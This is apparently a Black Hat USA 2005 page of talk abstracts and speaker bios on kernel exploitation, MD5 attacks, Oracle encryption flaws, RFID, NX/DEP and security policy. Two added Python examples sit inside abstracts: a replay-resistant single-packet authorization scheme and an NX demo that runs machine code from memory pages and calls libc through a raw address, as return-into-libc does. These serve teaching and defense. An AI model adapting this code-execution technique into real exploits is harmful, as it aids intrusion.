Barnaby Jack, Senior Research Engineer, eEye Digital Security, Inc

Almost every possible method and technique regarding Windows exploitation has been discussed in depth. Surprisingly, a topic that has rarely been touched on publicly is the remote exploitation of Win32 kernel vulnerabilities; a number of kernel vulnerabilities have been published, yet no exploit code has surfaced in the public arena. I predict we will see more kernel vulnerabilities in the future, as more core networking components are being implemented at the driver level.

In this presentation I will walk through the remote exploitation of a kernel level vulnerability. A number of payloads will be discussed and demonstrated, and I will explain how to overcome the various obstacles that arise when attempting to exploit ring 0 vulnerabilities. As a final demonstration, we will say goodnight to the Windows OS entirely.

Barnaby Jack is a Senior Research Engineer at eEye Digital Security. His role at eEye involves developing internal technologies, malicious code analysis, vulnerability research—and applying this research to the eEye product line. His main areas of interest include reverse engineering and operating system internals. He has been credited with the discovery of numerous security vulnerabilities, and has published multiple papers on new exploitation methods and techniques.

Return to the top of the page

Black Ops 2005
Dan Kaminsky

Another year, another batch of packet related stunts. A preview:

  1. A Temporal Attack against IP
    It is commonly said that IP is a stateless protocol. This is not entirely true. We will discuss a mechanism by which IP's limited stateful mechanisms can be exploited to fingerprint operating systems and to evade most intrusion detection systems.

  2. Application-layer attacks against MD5
    We will show how web pages and other executable environments can be manipulated to emit arbitrarily different content with identical MD5 hashes.

  3. Realtime visualizations of large network scans
    Building on Cheswick's work, I will demonstrate tools for enhancing our comprehension of the torrential floods of data received during large scale network scans. By leveraging the 3D infrastructure made widely available for gaming purposes, we can display and animate tremendous amounts of data for administrator evaluation.

  4. A High Speed Arbitrary Tunneling Stack
    Expanding on last year's talk demonstrating live streaming audio over DNS, I will now demonstrate a reliable communication protocol capable of scaling up to streaming video over multiple, arbitrary, potentially asymmetric transports.

Dan Kaminsky, also known as Effugas, is a Senior Security Consultant for Avaya's Enterprise Security Practice, where he works on large-scale security infrastructure. Dan's experience includes two years at Cisco Systems designing security infrastructure for large-scale network monitoring systems.

He is best known for his work on the ultra-fast port scanner scanrand, part of the "Paketto Keiretsu", a collection of tools that use new and unusual strategies for manipulating TCP/IP networks. He authored the Spoofing and Tunneling chapters for "Hack Proofing Your Network: Second Edition", was a co-author of "Stealing The Network: How To Own The Box", and has delivered presentations at several major industry conferences, including Linuxworld, DefCon, and past Black Hat Briefings.

Dan was responsible for the Dynamic Forwarding patch to OpenSSH, integrating the majority of VPN-style functionality into the widely deployed cryptographic toolkit. Finally, he founded the cross-disciplinary DoxPara Research in 1997, seeking to integrate psychological and technological theory to create more effective systems for non-ideal but very real environments in the field. Dan is based in Silicon Valley.

Return to the top of the page

The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process
Joseph Klein, Senior Security Consultant, Honeywell

The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes.

This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment.

The Pre-Engagement is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks.

Pre-Assessment is focused on identifying the scope of the project, limitations, targets and attack vectors. Also included are examples of what information must be gathered for use in the assessment and post-assessment phases.

The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact.

Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations.

Joe Klein, CISSP, is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space.

Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught “Hacking and Incident Handling”, “IDS/IPS management” and “Managing Network Security” at a local college in Jacksonville Florida. 

He regularly speaks at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.

Return to the top of the page

Circumvent Oracle’s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms
Alexander Kornbrust

This talk describes architecture flaws in Oracle's database encryption packages dbms_crypto and dbms_obfuscation_toolkit. These encryption packages are used to encrypt sensitive information in the database. An attacker can intercept the encryption key and use this key to decrypt sensitive information like clinical data, company secrets or credit card information. Even if a flexible key management algorithm (every row has its own key) is in use, it is possible to reverse engineer this algorithm quite fast.

A basic knowledge of Oracle databases (PL/SQL) is recommended.

Alexander Kornbrust is the founder and CEO of Red-Database-Security GmbH, a company specialised in Oracle security. He is responsible for Oracle security audits and Oracle Anti-hacker trainings. Before that he worked several years for Oracle Germany, Oracle Switzerland and IBM Global Services as consultant.

Alexander Kornbrust has worked with Oracle products as a DBA and developer since 1992. During the last 5 years he has found over 100 security bugs in different Oracle products.

Publications and further information can be found at:

Return to the top of the page

CaPerl: Running Hostile Code Safely
Ben Laurie

There are many circumstances under which we would like to run code we don't trust. This talk presents a method for making that possible with various popular scripting languages—the test case is Perl, but the technique will work with other languages. Also presented is an open source implementation for Perl, and various examples of its use - for instance, a web server that will run arbitrary code uploaded to it. Although some experience of Perl is useful, it is not

The basis of the technique is to compile a slightly modified dialect of Perl into capability-enforcing standard Perl, which is then run using a vanilla Perl interpreter.

Ben Laurie has worked for years on cryptography and security, particularly in the open source world. Perhaps best known for authoring Apache-SSL, the ancestor of almost all secure free webservers, he is also a core team member of OpenSSL and a founding director of the Apache Software Foundation. In his copious spare time, he is Director of Security for The Bunker Secure Hosting. He has published papers on subjects as diverse as knotted DNA and anonymous money. His current obsessions are privacy and security.

Return to the top of the page

All New Ø-Day
David Litchfield, Founder, Next Generation Security Software

David Litchfield leads the world in the discovery and publication of computer security vulnerabilities. This outstanding research was recognised by Information Security Magazine who voted him as 'The World's Best Bug Hunter' for 2003. To date, David has found over 150 vulnerabilities in many of today's popular products from the major software companies (the majority in Microsoft, Oracle).

David is also the original author for the entire suite of security assessment tools available from NGSSoftware. This includes the flagship vulnerability scanner Typhon III, the range of database auditing tools NGSSquirrel for SQL Server, NGSSquirrel for Oracle, OraScan and Domino Scan II.

In addition to his world leading vulnerability research and the continued development of cutting edge security assessment software, David has also written or co-authored a number of security related titles including "SQL Server Security", "Shellcoder's Handbook" and "Special Ops: Host and Network Security for Microsoft, UNIX and Oracle".

Return to the top of the page

Google Hacking for Penetration Testers
Johnny Long, Penetration Tester, CSC

Google Hacking returns for more guaranteed fun this year at Blackhat USA! If you haven’t caught one of Johnny’s Google talks, you definitely should. Come and witness all the new and amazing things that can be done with Google. All new for BH USA 2005, Johnny reveals basic and advanced search techniques, basic and advanced hacking techniques, multi-engine attack query morphing, and zero-packet target foot printing and recon techniques. Check out Google’s search-blocking tactics (and see them bypassed), and learn all about using Google to locate targets Google doesn’t even know about! But wait, there’s more! Act now and Johnny will throw in the all new “Google Hacking Victim Showcase, 2005” loaded with tons of screenshots (and supporting queries) of some of the most unfortunate victims of this fun, addictive and deadly form of Internet nastiness. Think you’re too über to be caught in a Google talk? Fine. Prove your badness. Win the respect of the audience by crushing the live Google Hacking contest! Submit your unique winning query by the end of the talk to win free books from Syngress Publishing and other cool gear! Or don’t. Just listen to your friends rave about it. Whatever.

Johnny Long is a “clean-living” family guy who just so happens to like hacking stuff. Over the past two years, Johnny’s most visible focus has been on this Google hacking “thing” which has served as yet another diversion to a serious (and bill-paying) job as a professional hacker and security researcher for Computer Sciences Corporation. In his spare time, Johnny enjoys making random pirate noises (“Yarrrrr!”), spending time with his wife and kids, convincing others that acting like a kid is part of his job as a parent, feigning artistic ability with programs like Bryce and Photoshop, pushing all the pretty shiny buttons on them new-fangled Mac computers, and making much-too-serious security types either look at him funny or start laughing uncontrollably. Johnny has written or contributed to several books, including “Google Hacking for Penetration Testers” from Syngress Publishing, which has secured rave reviews and has lots of pictures.

Return to the top of the page

Cisco IOS Security Architecture
Michael Lynn

Cisco IOS - the most widely deployed network infrastructure operating system— has been perceived as impervious to remote execution of arbitrary code from stack and heap overflows. Michael Lynn will provide an architectural overview of IOS and explore the feasibility of code execution against Cisco routers. Attendees should have a basic understanding of buffer overflow exploits.

Michael Lynn has an extensive background in embedded systems, including kernel development. His research interests include signals intelligence, cryptography, VoIP, reverse engineering, and any protocol designed by committee. Recently his research focus has been on securing critical routing infrastructures.

Return to the top of the page

SPA: Single Packet Authorization
MadHat Unspecific (Lee Heath), Hacker & Manager, Vernier Threat Labs
Simple Nomad, Hacker, BindView/NMRC

We needed a protocol that allowed us to tell a server that we are who we say we are, have it work across NAT, use TCP, UDP, or ICMP as the transport mechanism, act as an extra layer of security, and be secure itself. Oh, and do so with a single packet. Sound crazy? It's actually very useful. We've come up with Single Packet Authorization (SPA). This is a protocol for a remote user to send in a request to a server which cannot be replayed and which uniquely identifies the user. The proof-of-concept code alone is worthy of a presentation itself, but SPA is so much more. This is not port-knocking (although SPA can easily replace port-knocking with something much more secure).
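An added example of how the three properties the abstract lists (identifies the user, cannot be replayed, fits in one packet) can be met, written for this page and not the speakers' SPA implementation or wire format. The hypothetical payload is version, user id, timestamp, random nonce and requested port, followed by a truncated HMAC-SHA256 under a per-user shared key; the server verifies the tag in constant time, rejects packets outside a clock-skew window, and keeps the nonces it has accepted for the length of that window so a captured packet cannot be resent. The payload is transport-agnostic, so it can ride in a UDP datagram, a TCP segment or an ICMP echo payload. Field sizes, the window and the key handling are assumptions.

```python
import hashlib
import hmac
import os
import struct
import time

# Hypothetical wire format (an illustration, not the speakers' SPA):
#   version(1) | user id (16, NUL-padded) | unix time (8) | nonce (16) | requested port (2) | tag (16)
# The tag is HMAC-SHA256 over everything before it, keyed per user, truncated to 16 bytes.
BODY_FMT = "!B16sQ16sH"
BODY_LEN = struct.calcsize(BODY_FMT)
TAG_LEN = 16
VERSION = 1
WINDOW = 30   # seconds of clock skew the server tolerates


def build_packet(key, user, port, ts=None, nonce=None):
    """Client side: produce the single authorization payload."""
    ts = int(time.time()) if ts is None else ts
    nonce = os.urandom(16) if nonce is None else nonce
    uid = user.encode()[:16].ljust(16, b"\x00")
    body = struct.pack(BODY_FMT, VERSION, uid, ts, nonce, port)
    tag = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
    return body + tag


class SpaServer:
    """Server side: verify the tag, reject stale packets, reject replays by nonce."""

    def __init__(self, keys):
        self.keys = keys   # user -> shared key
        self.seen = {}     # nonce -> time after which the packet would be stale anyway

    def authorize(self, packet, now=None):
        """Return (request, reason); request is None unless reason == "ok"."""
        now = int(time.time()) if now is None else now
        if len(packet) != BODY_LEN + TAG_LEN:
            return None, "bad length"
        body, tag = packet[:BODY_LEN], packet[BODY_LEN:]
        version, uid, ts, nonce, port = struct.unpack(BODY_FMT, body)
        if version != VERSION:
            return None, "bad version"
        user = uid.rstrip(b"\x00").decode("utf-8", "replace")
        key = self.keys.get(user)
        if key is None:
            return None, "unknown user"
        expected = hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return None, "bad tag"
        if abs(now - ts) > WINDOW:
            return None, "stale"
        # Drop nonces whose packets would now fail the staleness check, then look for a replay.
        self.seen = {n: exp for n, exp in self.seen.items() if exp > now}
        if nonce in self.seen:
            return None, "replay"
        self.seen[nonce] = ts + WINDOW
        return {"user": user, "port": port}, "ok"


if __name__ == "__main__":
    k = os.urandom(32)
    srv = SpaServer({"alice": k})
    pkt = build_packet(k, "alice", 22)
    print(srv.authorize(pkt))   # ({'user': 'alice', 'port': 22}, 'ok')
    print(srv.authorize(pkt))   # (None, 'replay')
```

The nonce cache is what makes the packet single-use; the timestamp only bounds how long the cache has to remember it, so a server that loses the cache (restart) should refuse packets for one full window afterwards.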

MadHat leads the DC214, Dallas Defcon Group and is a member of NMRC. His paying gig is as the Manager of Vernier Threat Labs. Before working at Vernier, MadHat was one of the core security team members for Yahoo and led the vulnerability assessment and day-to-day security monitoring for Yahoo world-wide. He has written several open source security tools and has contributed to an upcoming book on NMap being written by Fyodor.

Simple Nomad is the founder of the Nomad Mobile Research Centre (NMRC), an international group of hackers that explore technology. By day he works as a Senior Security Analyst for BindView Corporation. He has spent several years developing and testing various computer systems for security strengths. He has authored numerous papers, developed a number of tools for testing the security and insecurity of computer systems, is a frequently-sought lecturer at security conferences, and has been quoted in print and television media outlets regarding computer security and privacy.

Return to the top of the page

Long Range RFID and its Security Implications
Kevin Mahaffey, Director of Development, Flexilis
Mark McGovern, Security Lead, In-Q-Tel
Paul Simmonds, CSO, ICI
Jon Callas, CTO, PGP Corp.

An RFID tagged pallet of expensive electronics was just rerouted to a warehouse where a team of hackers proceed to load it onto a truck. Nobody entered the shipyard. Sound impossible? Not Anymore.  

Long Range RFID will briefly explore the physics and technology behind the operation of RFID systems while highlighting the security issues surrounding widely deployed passive transponders. Our talk will go further to demonstrate custom designed hardware that can perform a denial of service attack against RFID readers and exploit passive transponders from distances never thought possible. We will explore the impact of RFID security issues in both current supply chain usages and the highly criticized deployment of RFID in passports, government-issued identification, currency, and post-supply-chain consumer goods. Finally, we will expand into a panel discussion about the future of RFID policy and security including industry leaders Mark McGovern, security lead for In-Q-Tel, Paul Simmonds, CSO of ICI, and Jon Callas (proposed), CTO of PGP Corporation.

Kevin Mahaffey is the Director of Development for Flexilis, an R&D firm based in Los Angeles, where he researches security issues in current and emerging technologies. He has previously spoken at DefCon 12 regarding the effects of commercial surveillance on American culture. In his spare time, Kevin is pursuing studies in Electrical Engineering at the University of Southern California.

Mark McGovern is a senior analyst with In-Q-Tel and leads their mobility and privacy technology investment programs. Mark has more than 16 years of experience developing and deploying secure systems. He's worked with a variety of Fortune 500 clients including Microsoft, MasterCard International, CitiBank, Symantec, CheckFree, the UK National Lottery and the Federal Reserve Banks of Richmond, New York and Boston. Mark began his career as an engineer with the Central Intelligence Agency. As an agency engineer he developed a wide variety of systems to support intelligence activities. In addition to these experiences, Mark has assisted the American Red Cross in designing computer and communications systems to support disaster service efforts. He's adapted submarine technologies for use in "Star Wars" missile defense systems, designed and built equipment for use on NASA's space shuttle, and developed software models to predict intercontinental ballistic missile trajectories. Mark holds a B.S. in Electrical Engineering from Worcester Polytechnic Institute and an M.S. in Systems Engineering from Virginia Polytechnic Institute.

Paul Simmonds joined ICI in 2001 when he was recruited to head up Information Security for ICI, working for the CIO Office in London. Prior to joining ICI he spent a short time with a high security European web hosting company as Head of Information Security, and prior to that seven years with Motorola, again in a global information security role. In his career he has worked with many external agencies, and has also been directly involved in two successful criminal prosecutions, giving evidence in one case.
Paul has a degree in Electronic Engineering and a City & Guilds in Radio Communication. He came to the Information Security field from a background in IT Systems Implementation and consultancy during which he wrote and implemented one of the UK's first web sites. Paul was voted 36th in the 2004 list of the top 50 most powerful people in networking, by the US publication Network World Fusion, for his work with the Jericho Forum.

Jon Callas is currently the CTO of PGP Corporation and has previously served as Chief Scientist at PGP Inc. and as CTO of the Network Security Division for Network Associates Technologies Inc. Jon Callas served as Director of Software Engineering at Counterpane Internet Security Inc. and was a co-architect of Counterpane’s Managed Security Monitoring system. Most recently, he was Senior Systems Architect at Wave Systems Corporation. His career includes work at Digital Equipment Corporation, World Benders, and Apple Computer. He is the principal author of the Internet Engineering Task Force’s (IETF’s) OpenPGP standard and a writer and frequent lecturer on system security and intellectual property issues. Jon Callas has a B.S. in Mathematics from the University of Maryland.


Performing Effective Incident Response  
Kevin Mandia, President, Red Cliff Consulting

During the course of 2004 and 2005, we have responded to dozens of computer security incidents at some of America’s largest organizations. Mr. Mandia was on the front lines assisting these organizations in responding to international computer intrusions, theft of intellectual property, electronic discovery issues, and widespread compromise of sensitive data. Our methods of performing incident response have altered little in the past few years, yet the attacks have greatly increased in sophistication. Mr. Mandia addresses the widening gap between the sophistication of the attacks and the sophistication of the incident response techniques deployed by “best practices.”

During this presentation, Mr. Mandia re-enacts some of the incidents; provides examples of how these incidents impacted organizations; and discusses the challenges that each organization faced. He demonstrates the “state-of-the-art” methods being used to perform Incident Response, and how these methods are not evolving at a pace equal to the threats. He outlines the need for new technologies to address these challenges, and what these technologies would offer. He concludes the presentation by discussing emerging trends and technologies that offer strategic approaches to minimize the risks that an organization faces from the liabilities the information age has brought.

Kevin Mandia is an internationally recognized expert in the field of information security. He has been involved with information security for over fifteen years, beginning in the military as a computer security officer at the Pentagon. He has assisted attorneys, corporations, and government organizations with matters involving information security compliance, complex litigation support, computer forensics, expert testimony, network attack and penetration testing, fraud investigations, computer security incident response, and counterintelligence matters. Mr. Mandia established Red Cliff specifically to bring together a core group of industry leaders in this field and solve client’s most difficult information security challenges.

Prior to forming Red Cliff, Kevin built the computer forensics and investigations group at Foundstone from its infancy to a multi-million dollar global practice that performed civil litigation support and incident response services. As technical and investigative lead, Mr. Mandia responded on-site to dozens of computer security incidents per year. He assisted numerous financial services and large organizations in handling and discreetly resolving computer security incidents. He also led Foundstone’s computer forensic examiners in supporting numerous criminal and civil cases. He has provided expert testimony on matters involving theft of intellectual property and international computer intrusion cases.


NX: How Well Does It Say NO to Attacker’s eXecution Attempts?  
David Maynor, Research Engineer, ISS X-Force R&D, Internet Security Systems

NX. It’s known by different names to different people. AMD calls it Enhanced Virus Protection, or EVP. Microsoft calls its support Data Execution Prevention, or DEP. After the press about how this new technology will stop hackers and worms in their tracks, many people call it a modern marvel. But this new technology has several layers of confusion surrounding it with regard to where it is implemented, how it protects and even when it's on. This talk will unwrap the information while showing that at best NX is a speed bump and not a stop sign to malicious intruders.
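The "how it protects" part can be seen directly on a Linux box. The Python below is an added example, not part of the talk or of ISS material: it copies a tiny "return 42" stub (x86-64 machine code constructed for this example) into a fresh page, calls it once from a read/write page and once from a page mapped executable, and then illustrates the "speed bump" point by calling libc's strlen through a raw address, which NX allows because that code is already executable. The stub bytes and the use of fork() to survive the crash are assumptions of the example; other CPUs are reported as unsupported rather than guessed at.

```python
import ctypes
import mmap
import os
import platform

# "return 42" in machine code, constructed for this example.  Only x86-64 is
# wired up; elsewhere the demo reports itself unsupported instead of guessing.
# endbr64 is a harmless NOP on CPUs without CET, and makes the stub a valid
# indirect-call target where CET is enforced.
_STUBS = {
    "x86_64": bytes.fromhex("f30f1efa" "b82a000000" "c3"),  # endbr64; mov eax,42; ret
}
_STUBS["AMD64"] = _STUBS["x86_64"]


def nx_demo_supported():
    return platform.machine() in _STUBS and hasattr(os, "fork")


def run_from_page(executable):
    """Copy the stub into a fresh anonymous page and jump to it in a child process.

    Returns the child's exit status (42 when the stub actually ran) or, if the
    child was killed by a signal, minus the signal number: -11 is SIGSEGV, the
    fault the CPU raises when NX forbids fetching instructions from the page.
    """
    if not nx_demo_supported():
        raise NotImplementedError("no stub for " + platform.machine())
    code = _STUBS[platform.machine()]
    pid = os.fork()
    if pid == 0:  # child: it may die, the parent only reads the status
        try:
            prot = mmap.PROT_READ | mmap.PROT_WRITE
            if executable:
                prot |= mmap.PROT_EXEC
            page = mmap.mmap(-1, mmap.PAGESIZE, flags=mmap.MAP_PRIVATE, prot=prot)
            page.write(code)
            addr = ctypes.addressof(ctypes.c_char.from_buffer(page))
            stub = ctypes.CFUNCTYPE(ctypes.c_int)(addr)
            os._exit(stub() & 0xFF)
        except BaseException:
            os._exit(255)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status):
        return -os.WTERMSIG(status)
    return os.WEXITSTATUS(status)


def call_existing_code():
    """What NX does not prevent: reaching code that is already executable.

    An attacker who controls a return address or function pointer does not need
    a writable page to run code from; pointing it at a libc function works with
    NX fully on.  Here the 'leaked' address is strlen's and the call goes through
    a raw integer address, the way a return-into-libc payload would.
    """
    libc = ctypes.CDLL(None)
    leaked_address = ctypes.cast(libc.strlen, ctypes.c_void_p).value
    strlen = ctypes.CFUNCTYPE(ctypes.c_size_t, ctypes.c_char_p)(leaked_address)
    return strlen(b"no shellcode needed")  # 19


if __name__ == "__main__":
    if nx_demo_supported():
        print("RWX page:", run_from_page(True))   # 42
        print("RW page :", run_from_page(False))  # -11
    print("existing code:", call_existing_code())
```

The two page calls show where NX bites: the same bytes run from the executable mapping and fault from the writable one. The third call is the part marketing leaves out: NX says nothing about which existing code a corrupted pointer may land in.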

David Maynor is a research engineer with the ISS X-Force R&D team, where his primary responsibilities include reverse engineering high risk applications, researching new evasion techniques for security tools, and researching new threats before they become widespread. Before ISS, Maynor spent three years at the Georgia Institute of Technology (GaTech), the last two as part of the information security group, as an application developer helping to make the sheer size and magnitude of security incidents on campus manageable. Before that Maynor contracted with a variety of companies in a wide range of industries, from digital TV development to protection of top 25 websites, security consulting and penetration testing, online banking and ISPs.


The Non-Cryptographic Ways of Losing Information 
Robert Morris, former chief scientist, NSA

To fully understand how to protect crucial information in the modern world, one needs to fully understand how the modern spy steals it. Since the glorious days of cryptanalysis during World War II, the art of stealing and protecting information has drastically changed. Using over 25 years of NSA field-stories, this talk will highlight the lesser-known world of stealing data: eavesdropping, theft, purchase, burglary, blackmail, bribery, and the like. Furthermore, my talk will highlight ways one can avoid the common pitfalls of carelessness and overconfidence that give the modern spy a full access pass.

Robert Morris received a B.A. in Mathematics from Harvard University in 1957 and an M.A. in Mathematics from Harvard in 1958. He was a member of the technical staff in the research department of Bell Laboratories from 1960 until 1986. On his retirement from Bell Laboratories in 1986 he began work at the National Security Agency. From 1986 to his (second) retirement in 1994, he was a senior adviser in the portion of NSA responsible for the protection of sensitive U.S. information.


The National ID Debate 
Moderator: David Mortman, CISO, Siebel Systems
Dennis Bailey, COO, Comter Systems and author of "The Open Society Paradox"
Jim Harper, Director Information Policy Studies, The Cato Institute
Rhonda E. MacLean, Charter Member, Global Chief Security Officer Council

As a result of the Real-ID Act, all American citizens will have an electronically readable ID card that is linked to the federal database by May 2008. This means that in three years we will have a National ID card system that is being unilaterally controlled by one organization (DHS) whether we want it or not. Organizations such as the ACLU are already exploring opportunities for litigation. Privacy advocates cite Nazi Germany and slippery slopes, while the government waves the anti-terrorism flag back in their faces. Compromises and alternate solutions abound.

Join us for a lively debate/open forum as an attempt to find a usable solution to this sticky problem. We will review solutions from the AMANA as well as ask why passports are not considered to be a privacy problem in the same ways. Would a National ID card make us safer? What to do about 15 million illegal immigrants? If college students can fake an ID, why can't a terrorist? What civil rights are abrogated by requiring everyone to possess an ID? What problem are we trying to solve anyway, and will federal preemption address it?

David Mortman, Chief Information Security Officer for Siebel Systems, Inc., and his team are responsible for Siebel Systems' worldwide IT security infrastructure, both internal and external. He also works closely with Siebel's product groups and the company's physical security team and is leading Siebel's product security and privacy efforts. Previously, Mr. Mortman was Manager of IT Security at Network Associates, where, in addition to managing data security, he deployed and tested all of NAI's security products before they were released to customers. Before that, Mortman was a Security Engineer for Swiss Bank. A CISSP, member of USENIX/SAGE and ISSA, and an invited speaker at the RSA 2002 and 2005 security conferences, Mr. Mortman has also been a panelist at InfoSecurity 2003 and Blackhat 2004. He holds a BS in Chemistry from the University of Chicago.

Dennis Bailey is the Chief Operating Officer for Comter Systems, a top-secret, 8(a) information technology and management consulting firm based out of Fairfax, Virginia. He is also the author of "The Open Society Paradox: Why the Twenty-First Century Calls for More Openness Not Less", a recently published book which makes the case for secure identification and information sharing. He is active in the fields of identification, information sharing and security. He was a participant in the Sub-group on Identification for the Markle Foundation Task Force on Terrorism. He participates on the ITAA's Identity Management Task Group and is a member of the Coalition for a Secure Driver's License. His education includes a master's degree in political science from American University, where he worked at the Center for Congressional and Presidential Studies. Dennis also has a master's degree in psychology from the University of Dayton, where he worked at the Social Science Research Center.

Jim Harper: As director of information policy studies, Jim Harper speaks, writes, and advocates on issues at the intersection of business, technology, and public policy. His work focuses on the difficult problems of adapting law and policy to the unique problems of the information age. Jim is also the editor of, a Web-based think-tank devoted exclusively to privacy. He is a member of the Department of Homeland Security's Data Privacy and Integrity Advisory Committee. In addition to giving dozens of speeches and participating in panel discussions and debates nationwide, Jim's work has been quoted and cited by USA Today, the Associated Press, and Reuters, to name a few. He has appeared on numerous radio programs and on television, commenting for Fox News, CBS News, and MSNBC. Jim is a native of California and a member of the California bar. He earned his bachelor's degree in political science at the University of California, Santa Barbara, where he focused on American politics and the federal courts. At Hastings College of the Law, Jim served as editor-in-chief of the Hastings Constitutional Law Quarterly. In addition to numerous writings and ghost-writings in the trades and popular press, his scholarly articles have appeared in the Administrative Law Review, the Minnesota Law Review, and the Hastings Constitutional Law Quarterly.

Rhonda E. MacLean is a charter member of the Global Council of Chief Security Officers.  The Council is a think tank comprised of a group of influential corporate, government and academic security experts dedicated to encouraging dialogue and action to meet the new challenges of global online security. 

MacLean provided leadership as the Global Chief Information Security Officer for Bank of America from 1996 until 2005. At Bank of America she was responsible for company-wide information security policies and procedures, support for the lines of business in their management of information risk, implementation of security technology, cyber forensics and investigations, and awareness for the company’s leadership, associate base and outside suppliers. In that role she provided leadership for a number of company-wide initiatives designed to protect sensitive customer and company information. In addition, under her leadership the bank’s corporate information security organization has been a leader in innovation, filing for numerous U.S. Patents in the areas of infrastructure risk management and information security.

After many years of service on some of the industry’s most important associations, advisory boards and think tanks, she was appointed in 2002 by the Secretary of the Treasury to serve as the financial services sector coordinator for critical infrastructure protection and homeland security. In that role, she established a Limited Liability Corporation which brought together 26 financial service trade associations, utilities and professional institutes to work in partnership with Treasury to create several important industry initiatives designed to ensure industry cooperation and resiliency. She continues to serve as Chairman Emeritus for the Council. 

In September 2003, The Executive Women’s Forum named MacLean one of five “Women of Vision”, one of the top business leaders shaping the information security industry. MacLean was named one of the 50 most powerful people in the network industry in NetworkWorld’s 2003 and 2004 issues. In recognition of her continued leadership in the security field, she was awarded CSO’s Compass Award in 2005. In April 2005, The Friends of a Child’s Place, a Charlotte-based advocacy for the homeless, named her one of the “First Ladies of Charlotte” in recognition of her pioneering role in information security and her support for the Charlotte community.

MacLean has spent more than 25 years in the information technology industry. Immediately before joining Bank of America, MacLean spent 14 years at The Boeing Company where she was the Senior Information Security Manager for Boeing’s proprietary and government programs. She is certified by the Information Systems Audit and Control Association as a Certified Information Security Manager.


CISO Q&A with Jeff Moss
Scott Blake, Liberty Mutual
Pamela Fusco, Merck
Andre Gold, Continental Airlines
Ken Pfeil, Capital IQ
Justin Somaini, Verisign

Jeff Moss, founder of Black Hat, invites Chief Information Security Officers from global corporations to join him on stage for a unique set of questions and answers. What do CISOs think of Black Hat, David Litchfield, Dan Kaminsky, Joe Grand, Johnny Long, Metasploit, and DEFCON? How many years before deperimeterization is a reality? Is security research more helpful or harmful to the economy? What privacy practices do CISOs personally use? These questions and others from the audience will be fielded by this panel of security visionaries.

Scott Blake is Chief Information Security Officer for Liberty Mutual Insurance Group and is responsible for information security strategy and policy. Prior to joining Liberty, Scott was Vice President of Information Security for BindView Corporation where he founded the RAZOR security research team and directed security technology, market, and public affairs strategy. Scott has delivered many lectures on all aspects of information security and is frequently sought by the press for expert commentary. Since 1993, Scott has also worked as a security consultant, IT director, and network engineer. He holds an MA in Sociology from Brandeis University, a BA in Social Sciences from Simon's Rock College, and holds the CISM and CISSP security certifications.

Pamela Fusco, CISSP, CISM, CHS-III, Chief Security Officer, Merck & Co., Inc.
Pamela Fusco is an Executive Global Information Security Professional for Merck & Co., Inc. She has accumulated over 19 years of substantial experience within the security industry. Her extensive background and expertise extend globally, encompassing all facets of security including logical, physical, personal, facilities, systems, networks, wireless, and forensic investigations. Presently she leads a talented team of Compliance, Systems and Information Security Engineers operating a world-wide 24x7x365 SIRT (security incident response team).

Andre Gold is currently Director of Information Security at Continental Airlines, one of the world's largest and most successful commercial and freight transportation providers. Before assuming his current role, Mr. Gold served as Technical Director of Internet Services, responsible for Continental's property, which contributes over a billion dollars a year in revenue for Continental. Prior to Continental Airlines, Inc. Mr. Gold worked as a consultant in the IT industry. Mr. Gold has a BBA in Computer Information Systems from the University of Houston-Downtown and received his commission in the Army from Wentworth Military Academy. In addition to his position at Continental, Mr. Gold serves on the Microsoft Chief Security Officer Council, the Skyteam Data Privacy and Security Subcommittee, as well as eEye Digital Security's Executive Advisory Council.

Ken Pfeil is CSO at Capital IQ, a web-based information service company headquartered in New York City. His experience spans over two decades with companies such as Microsoft, Dell, Avaya, Identix, and Merrill Lynch. Ken is coauthor of the books "Hack Proofing Your Network - 2nd Edition" and "Stealing the Network - How to Own the Box," and a contributing author of "Security Planning and Disaster Recovery" and "Network Security – The Complete Reference."

Justin Somaini is Director of Information Security at VeriSign Inc. where he is responsible for managing all aspects of network and information security for VeriSign. With over 10 years of Information Security and Corporate Audit experience, Justin has leveraged his knowledge of audit and large organizations to remediate global infrastructure problems and create a full risk identification and remediation Information Security group. Previously, Justin was the Director of Information Security Services for Charles Schwab Inc., where he was responsible for all aspects of Information Security Operations. Before that he was a Manager with PricewaterhouseCoopers LLP where he spent several years developing their attack and penetration leadership and audit practice.


Owning the C-suite: Corporate Warfare as a Social Engineering Problem 
Shawn Moyer, CISSP, Lead Security Product Manager, unnamed Fortune 100

Let's face it, you ROCK at building InfoSec tech, but you SUCK at corporate warfare. Sooner or later, you WILL have to sit in a boardroom with the suits and justify your existence. If you approach your own survival and that of your security team's as a Social Engineering problem, it can not only work for you, but it can be FUN. Don't let them own you, own THEM.

Shawn Moyer is a Lead Security Product Manager for InfoSec for one of the US's largest finance companies. He has lots of three and four letter acronyms after his name, and has led InfoSec teams at startups and smaller companies in the past. He has spent much of his career getting people who hate security to love it, and finding ways to get non-geeky people to see why they need geeks. He has been attending BH and DC for quite a few years, but has managed to keep his mouth shut until now.


Economics, Physics, Psychology and How They Relate to Technical Aspects of Counter Intelligence/Counter Espionage Within Information Security
Mudge aka Peiter Mudge Zatko, Division Scientist, BBN Technologies

